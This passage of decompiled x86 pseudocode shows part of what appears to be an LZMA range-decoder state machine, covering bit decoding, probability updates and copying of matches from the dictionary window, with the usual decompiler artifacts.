                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t537 =  *(_t644 - 0x84);
                          											L140:
                          											 *(_t644 - 0x88) = _t537;
                          											goto L1;
                          										case 6:
                          											L25:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L36:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L26:
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												L35:
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												L32:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											L66:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												L68:
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											L67:
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											L70:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											L73:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											L74:
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											L75:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											L82:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L84:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L83:
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											L85:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L164:
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											L100:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L159:
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											L38:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											L40:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												L45:
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L160:
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											L47:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												L49:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													L53:
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L161:
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											L59:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												L65:
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L165:
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											L110:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											goto L132;
                          										case 0x12:
                          											L128:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L131:
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												L132:
                          												 *(_t644 - 0x54) = _t642;
                          												goto L133;
                          											}
                          											L129:
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											L141:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L143:
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          											L142:
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											L156:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											while(1) {
                          												L140:
                          												 *(_t644 - 0x88) = _t537;
                          												goto L1;
                          											}
                          										case 0x15:
                          											L91:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											goto L0;
                          										case 0x17:
                          											while(1) {
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          										case 0x18:
                          											goto L146;
                          										case 0x19:
                          											L94:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												L98:
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													L166:
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												L121:
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												L122:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											L95:
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												L97:
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													L107:
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														L118:
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													L113:
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														L117:
                          														goto L109;
                          													}
                          												}
                          												L103:
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													L106:
                          													goto L99;
                          												}
                          											}
                          											L96:
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L162:
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											L57:
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L163:
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											L77:
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												L124:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L127:
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											L167:
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t539 = _t538 | 0xffffffff;
                          								goto L172;
                          							}
